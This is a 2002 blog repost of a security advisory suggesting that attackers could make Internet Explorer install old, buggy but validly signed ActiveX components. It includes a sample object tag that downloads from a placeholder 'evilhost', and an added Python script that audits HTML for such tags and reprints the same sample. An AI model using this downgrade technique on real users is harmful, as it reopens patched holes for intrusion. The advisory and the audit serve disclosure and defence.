Digitally signing buggy ActiveX components

Georgi Guninski raises an interesting question:
http://www.guninski.com/signedactivex.html
Digitally signing buggy ActiveX components
Date: 14 February 2002
Disclaimer:
This is just an unverified suspicion. I don't claim this information is
true.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Description:
Back in 1999 Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> made an
excellent point at:
http://archives.neohapsis.com/archives/ntbugtraq/1998-1999/msg00422.html
-------------------
3- Even if Microsoft fixes the hole the hole could exist forever. Why?
As far as I know this is the first time a hole is "SIGNED".
MS has released a "dhtmed.cab" file as an ActiveX component signed by Microsoft
-------------------
Here is more on this.
ActiveX in Internet Explorer allows downloading from the web and installing
signed components (native code) on the user's computer.
As history shows, a lot of ActiveX components are buggy and a new version is
released. The interesting part is the buggy version is still really signed and
available in one form or another.
A pure hypothetical scenario is to try to install the old buggy signed version
if the user doesn't have it or on top of the patched one.
Basically this is done this way:
--------------------
<object codebase="http://evilhost/buggyreallysigned.file"
classid="clsid:speciallycrafted">
</object>
--------------------
So, I wonder whether doing such mischief may lead to old exploits starting to
work?
Workaround/Solution:
Don't know whether this is a real threat, this is just a suspicion.
Anyway, to prevent such stuff, in Internet Explorer security options
disable everything that contains "active".
Or at least if you see a prompt "...This is digitally signed by X..."
think about whether you really trust X, having in mind his security record.
Regards,
Georgi Guninski
http://www.guninski.com
maggie
2/15/2002 6:23:00 AM
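
An added example, not part of the original post or of Guninski's advisory: a small audit that scans stored HTML for `<object>` tags that name both a `clsid:` class and a `codebase` download source outside an allowlist. It ignores signatures on purpose, since the advisory's point is that a valid signature says nothing about whether the component is the patched version. The allowlist, the page URL and the second sample tag are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumption: hosts this site accepts component downloads from (constructed).
TRUSTED_HOSTS = frozenset({"intranet.example"})
PAGE_URL = "http://intranet.example/portal.html"  # constructed


class ObjectCodebaseAuditor(HTMLParser):
    """Collect <object> tags that ask the browser to fetch a component."""

    def __init__(self, page_url, trusted_hosts=TRUSTED_HOSTS):
        super().__init__()
        self.page_url = page_url
        self.trusted_hosts = trusted_hosts
        self.findings = []  # (line, classid, codebase host)

    def handle_starttag(self, tag, attrs):
        if tag != "object":  # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        classid = a.get("classid", "").strip()
        codebase = a.get("codebase", "").strip()
        # Only tags that name a COM class *and* a download source matter here.
        if not classid.lower().startswith("clsid:") or not codebase:
            return
        # Resolve relative and scheme-relative values against the page URL.
        host = (urlsplit(urljoin(self.page_url, codebase)).hostname or "").lower()
        if host not in self.trusted_hosts:
            self.findings.append((self.getpos()[0], classid, host))


def audit_html(html, page_url=PAGE_URL):
    auditor = ObjectCodebaseAuditor(page_url)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample: the first tag mirrors the advisory's snippet,
# the second loads from the page's own (allowlisted) host.
SAMPLE = """<html><body>
<object codebase="http://evilhost/buggyreallysigned.file"
classid="clsid:speciallycrafted">
</object>
<object codebase="/controls/viewer.cab#version=1,0,0,0"
classid="clsid:00000000-0000-0000-0000-000000000000"></object>
</body></html>"""

if __name__ == "__main__":
    print(audit_html(SAMPLE))
```
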